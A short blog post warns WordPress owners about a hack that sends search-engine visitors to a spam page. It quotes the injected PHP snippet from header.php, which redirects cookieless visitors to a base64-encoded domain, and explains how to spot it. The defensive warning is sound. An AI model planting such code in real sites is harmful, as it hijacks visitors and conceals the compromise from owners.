WordPress Redirect h4x’s

Lately I have noticed some peoples blogs had been redirecting to some spammy landing page when you goto them from Google. I notified them about it and they thought I was nuts… cause they could not reproduce it.

Donncha (wish your girlfriend was hot like me(sorry)) O Caoimh well known wordpress developer has made a great post about how sites are hacked and also what to look for.

Donncha also has pinpointed the redirect and cookie hack which is very difficult to detect but what I have suspected has been going on:

< ?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");

$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER&#91;'HTTP_REFERER'&#93;),$ref)!==false){ $ser="1"; break; }

if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>

The code above basically redirects people from your website to their choice if:

1) they are coming from a search engine or other big referral site.
2) they have never visited your site before (no cookies are set).

Its pretty slick and very hard to detect since only NEW visitors would be effected.

Make sure you check all of your blogs for that code. (in header.php)